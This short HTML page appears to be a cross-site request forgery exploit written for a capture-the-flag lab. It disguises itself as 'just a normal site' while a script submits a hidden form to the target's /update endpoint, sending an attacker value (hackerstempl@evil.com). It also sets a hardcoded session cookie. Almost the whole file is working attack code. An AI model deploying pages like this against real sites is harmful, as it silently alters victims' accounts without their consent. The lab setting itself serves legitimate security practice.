<!DOCTYPE html>
<html>
<head>
    <title>Hacker Site - You've been pwned!</title>
</head>
<body >
<h1>Nothing to see here... just a normal site.</h1>

<form id="csrf-form" action="https://76ac6b1e-ff0d-4a8c-a7f4-3627bdfb9f18.pico.p.lf-labs.org/update" method="POST"
      onsubmit="document.cookie='session=eyJsb2dnZWRpbiI6dHJ1ZSwidXNlcklkIjoxfQ.aautCg.3itIBbWQ22X92j5vST3jGZtXpsM;">
    <input type="hidden" name="color" value="hackerstempl@evil.com">

</form>

<script>
    // Note: This script can only set cookies for LOCALHOST:8080.
    // It cannot set cookies for the PICO domain.
    document.cookie = "session=eyJsb2dnZWRpbiI6dHJ1ZSwidXNlcklkIjoxfQ.aautCg.3itIBbWQ22X92j5vST3jGZtXpsM";
document.getElementById('csrf-form').submit();
    console.log("Form is being submitted automatically...");
</script>
</body>
</html>